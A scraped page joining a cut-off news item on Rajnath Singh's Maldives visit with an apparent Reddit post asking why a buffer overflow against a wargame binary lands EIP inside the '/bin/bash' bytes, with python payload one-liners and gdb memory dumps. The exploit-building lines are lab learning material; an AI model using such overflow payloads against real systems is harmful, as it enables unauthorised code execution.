Rajnath Singh’s Three-Day Visit To Maldives Commences Today

Defence minister Rajnath Singh is scheduled to visit the Maldives from May 1 to 3 for discussions with the country’s top officials, an official statement from the Ministry of Defence informed. The statement noted, “In line with India’s commitment to capacity building of friendly countries and partners in the region, Singh will hand over one fast patrol vessel and a landing craft to the Maldives

May 1, 2023

EIP address set incorrectly during buffer overflow attack.

I have run into this issue twice now, and I have no idea what I might be doing wrong. I think I managed to overcome it the first time by adjusting the NOP sled slightly, but that doesn’t seem to be working on this program.

I am always able to overwrite the EIP address with \x66 bytes, no problem.

```
Starting program: /levels/level1 $(python -c "print '\x55' * (1040 - 128 - 9 - 4) + '\x90' * 128 + '\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68' + '\x66' * 4")

Program received signal SIGSEGV, Segmentation fault.
0x66666666 in ?? ()
```

However, when I actually set an address in the middle of my NOP sled, it comes out incorrectly for some reason.

```
0xbffffcfe: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffffd06: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffffd0e: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffffd16: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffffd1e: 0x90 0x90 0x90 0x90 0x2f 0x62 0x69 0x6e
0xbffffd26: 0x2f 0x62 0x61 0x73 0x68 0x66 0x66 0x66
0xbffffd2e: 0x66 0x00 0x53 0x48 0x45 0x4c 0x4c 0x3d
0xbffffd36: 0x2f 0x62 0x69 0x6e 0x2f 0x62 0x61 0x73

Starting program: /levels/level1 $(python -c "print '\x55' * (1040 - 128 - 9 - 4) + '\x90' * 128 + '\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68' + '\xfe\xfc\xff\xbf'")

Program received signal SIGSEGV, Segmentation fault.
0xbffffd23 in ?? ()
```

As you can see, it keeps pointing to the second byte of my payload, no matter which address I choose within the NOP sled.

I assume there’s something I’m missing here, but I’m not sure what it might be. Any pointers?

EDIT

Solved! The payload was bad (my fault). See comment below for details.

submitted by /u/AngrySilverback710

May 1, 2023